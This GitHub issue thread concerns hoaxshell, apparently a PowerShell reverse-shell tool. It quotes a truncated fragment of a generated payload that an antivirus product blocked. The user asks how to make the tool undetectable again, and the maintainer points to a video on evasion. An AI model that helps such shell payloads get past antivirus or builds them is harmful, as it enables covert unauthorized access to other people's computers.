### ISSUE TITLE
Detected by antivirus!!

### ISSUE THREAD

**Issue by Divinemonk** [t3l3machus/hoaxshell#50]
I tried to run the `powershell -e *` generated by `hoaxshell`, but it returned this error:

```
At line:1 char:1
+
$s='*.*.*.*:8080';$i='c55b3450-03c33f0f-4e17c4ce';$p='http://';$v
...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your
antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsError
   RecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent
```

The sole purpose of hoaxshell is been undetectable, is there any way this could be fixed (or now antivirus has got footprint of hoaxshell)!?

**Comment by t3l3machus** [comment]
Open source malware stuff will always end up being detected. Here's how to deal with it: https://www.youtube.com/watch?v=grSBdZdUya0

**Comment by Divinemonk** [comment]
Thank you :)
